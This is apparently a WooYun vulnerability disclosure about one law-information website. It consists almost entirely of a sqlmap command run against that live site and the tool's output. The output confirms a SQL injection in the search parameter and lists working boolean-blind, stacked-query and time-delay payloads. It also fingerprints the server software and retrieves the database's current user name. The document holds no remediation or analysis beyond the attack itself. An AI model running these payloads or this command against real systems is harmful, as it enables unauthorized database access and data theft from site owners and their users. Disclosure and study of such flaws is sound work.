WooYun.org

sqlmap -u "http://laws.66law.cn/list.aspx?keys=*" --dbms="Microsoft SQL Server" --current-user

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://laws.66law.cn:80/list.aspx?keys=%' AND 4957=4957 AND '%'='
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: http://laws.66law.cn:80/list.aspx?keys=%'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: http://laws.66law.cn:80/list.aspx?keys=%' WAITFOR DELAY '0:0:5'--
---
[12:13:41] [INFO] testing Microsoft SQL Server
[12:13:41] [INFO] confirming Microsoft SQL Server
[12:13:41] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
[12:13:41] [INFO] fetching current user
[12:13:41] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[12:13:41] [INFO] retrieved:
[12:13:41] [WARNING] reflective value(s) found and filtering out
66lawapp
current user:    '66lawapp'